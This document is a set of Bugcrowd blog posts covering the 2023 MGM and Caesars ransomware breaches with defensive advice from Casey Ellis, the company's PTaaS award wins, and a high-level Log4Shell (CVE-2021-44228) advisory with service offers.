I sat down with Bugcrowd CTO and Founder, Casey Ellis, to understand what exactly is happening with these recent casino breaches.

What happened

In September, MGM, who owns more than 20 hotels and casinos, reported a cybersecurity issue that impacted digital systems like hotel room keys to slot machines. Caesars Entertainment also experienced a breach, in which manyMaine residents had their information stolen by a ransomware group. It’s important to note here that when a breach happens, it is easy to point fingers, when in reality, breaches can happen to anyone. However, there are methods that organizations can keep in mind so they are more prepared during a possible breach. 

Based on current information, it appears the breaches can be traced to a Russia-based ransomware group called ALPHV known for social engineering as their initial access technique. By using social engineering, they can prey on human instincts to find easier access into an organization. In the interview, Casey explained how common it is for humans to want to be helpful, especially at work. This is normally a great aspect of society, but it can also lead to costly mistakes when being targeted by a social engineering campaign. “There are all sorts of techniques, but there is no technical control for humans wanting to be helpful. The bad guys know that and that’s part of what they exploit to do stuff like this,” Casey said. 

The impact

When it comes to business operations in a casino and hotel coming to a screeching halt, it’s safe to say that breaches like these cost organizations millions of dollars. There is also untold reputational damage. 

In general with planned orchestrated ransomware attacks like these, they often get announced in different places. For example, the ransomware note will get posted on the internet so people can track what is going on. That being said, the MGM breach got more news coverage than the Caesars breach for several reasons. The MGM breach had a more visible impact on daily operations and customers, therefore the story got picked up by more news outlets. The drama of people waiting in line for hours and flashing lights on slot machines makes better news stories. Another reason why the Caesars attack seemingly went under the radar is because many believe that Caesars paid the ransom. This led to them restoring operations quickly. 

Casey predicted that gaming companies and casino giants are going to continue to be heavily targeted. Logically, this makes sense, considering the massive amounts of money that threat actors are making from these sorts of attacks. 

Preventing cyberattacks 

For organizations seeing these breaches and thinking about what they should be doing to protect themselves from similar attacks, Casey recommends they do a tabletop exercise. A tabletop exercise entails organizations thinking about what exactly they would do in a hypothetical breach scenario. It’s like sitting around a table with your team and discussing what you would do if your production systems got denied and encrypted, along with your backup systems, and you didn’t even have a skeleton set of infrastructure to continue operations off of. What would you do? Think about your response, how long it would take to recover, and how much it would cost.

This helps organizations spend the time testing response plans before they actually need them, instead of dealing with the fallout in the middle of the chaos of the actual event. “You want to freak out about this just enough to start asking new questions that are going to make you more resilient as an organization. I don’t believe in freaking out so much that you get paralyzed and just give up,” Casey said. 

As another step, organizations should examine business operations to make sure it is harder for attackers to get in in the first place. This is where security testing and organizations like Bugcrowd come in, where the security researcher and hacker community can come in and basically say, “if I was a bad guy trying to get into your stuff, here’s how I’d do it and here is how difficult or easy it would be.” That sort of knowledge, from a preventative standpoint, is incredibly important because it allows organizations to prevent attacks before threat actors have a chance to even look into their systems. 

I hope you enjoy the interview just as much as I did! By the way, if you’re interested in stories of cybersecurity attacks, check out our new video series, Unsolved Cyber Mysteries.

The post Security Flash – Cyberattacks on MGM and Caesars appeared first on Bugcrowd.

In 2023 alone, Bugcrowd, and in particular these new PTaaS capabilities, has won five distinct industry awards. This recent string of wins demonstrates Bugcrowd’s persistence in delivering industry-leading solutions to the market and validation as an accomplished and preeminent organization throughout cybersecurity.

Most recently, our team was recognized by Cyber Defense Magazine’s Global InfoSec Awards as a Hot Company in the Penetration Testing Category for our PTaaS capabilities, along with being recognized as a Gold Winner in the 19th Annual Globee® Cyber Security Awards for the technology. Additionally, Bugcrowd PTaaS was recognized as the Gold Winner in the Pentest-as-a-Service category in the 2023 Cybersecurity Excellence Awards among North American companies between 1,000 and 5,000 employees.

As an organization, we took home two more wins in the Cybersecurity Excellence Award program with recognition as Gold Winner for Cybersecurity Provider of the Year and Silver Winner for Best Cybersecurity Company.

For one, I am so proud to see all of these incredible wins. It’s a huge testament to our stellar team and technology! At Bugcrowd, we are committed to delivering the very best crowdsourced solutions to our customers and ultimately fulfilling our mission to democratize security testing for all.

Our team has taken major strides over the course of the past year to walk out this mission, including a major upgrade to our PTaaS offering, all aimed at staying at the forefront of innovation and leadership within a very saturated cybersecurity market. With a surge of vendors offering security testing solutions, a common concern that we hear is that vulnerability assessments in the market today are often shallow and low impact. 

Our goal was to provide a human-driven, high-impact pen test with a team matched to their precise needs with just a few clicks, cutting configuration time from days to hours. These recent award wins validate our work and the direction we’ve been laser-focused on. By focusing our priorities on our employees, the hacker community, partners and vendors, we are excited to build upon this momentum throughout 2023!

To learn more about our award-winning PTaaS offering, which is now available globally, visit https://www.bugcrowd.com/products/pen-test-as-a-service/.

The post Bugcrowd PTaaS Takes Home Five Awards for Cybersecurity Excellence appeared first on Bugcrowd.

Key Facts

Affected: Systems and services using Apache Log4j versions 2.0-beta9 to 2.14.1
Severity: 10.0 Critical
CVE Entry: CVE-2021-44228
NIST NVD Publish Date: 12/10/2021
Source: Apache Software Foundation

On Dec. 9, 2021, a zero-day exploit (since dubbed “Log4Shell”) was observed in the wild targeting a critical RCE vulnerability in Log4j, the ubiquitous open source logging tool. (Per NIST, in affected versions, JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI-related endpoints.) Numerous platforms appear to have been affected–including Apple, Cloudflare, and Twitter–in addition to the raft of popular Java ecosystem products with Log4j embedded in their software supply chains, such as Logstash, Apache Kafka, Elasticsearch, and even Minecraft. 

Observers consider the Log4j vulnerability the worst one in years, perhaps even more critical than the Apache Struts RCE vulnerability (CVE-2017-5638) of 2017 that contributed to a massive breach at Equifax. Per Bugcrowd Founder and CTO Casey Ellis, this new vuln is a toxic cocktail combining immense attack surface, easy exploitation, hard-to-avoid dependencies, and extreme virality. Among other things, it’s a reminder that software supply chains have become deeply complex, with layered inter-dependencies that are usually beyond the reach of automated tools like scanners.

When the dust inevitably settles, it will be a clarifying moment for organizations that have yet to take a continuous, platform-powered security testing approach that combines data, technology, and human intelligence, including the force multiplier of the Crowd, to find and remediate vulnerabilities before they cause damage. In a future blog post, we’ll describe how that approach helped Bugcrowd verify, validate, contextualize, and communicate Log4Shell exposures to customers within hours.

In the meantime, we’re eager to help by offering:

1. A 30-day “Log4j On Fire” bug bounty solution for continuous, crowd-powered discovery of Log4Shell exposures on your perimeter. See details and get started here.
2. Deeper insights about this vuln’s risk profile and future impact in this Security Flash video featuring Casey Ellis and Application Security Engineer Adam Foster.
3. A live Q&A session with Casey next week (Monday Dec. 20 at 10am PST) to answer your questions about finding, safeguarding, and using best practices to address the Log4j vuln and Log4Shell exploit. Save your seat here.
4. A single view into all our Log4j/Log4Shell resources here.

We are super proud of our customers, researchers, and team-members who are working together tirelessly to make our digitally connected world safer during this crisis. As always, we’ll get through it together!

The post Log4Shell, The Worst Java Vulnerability in Years appeared first on Bugcrowd.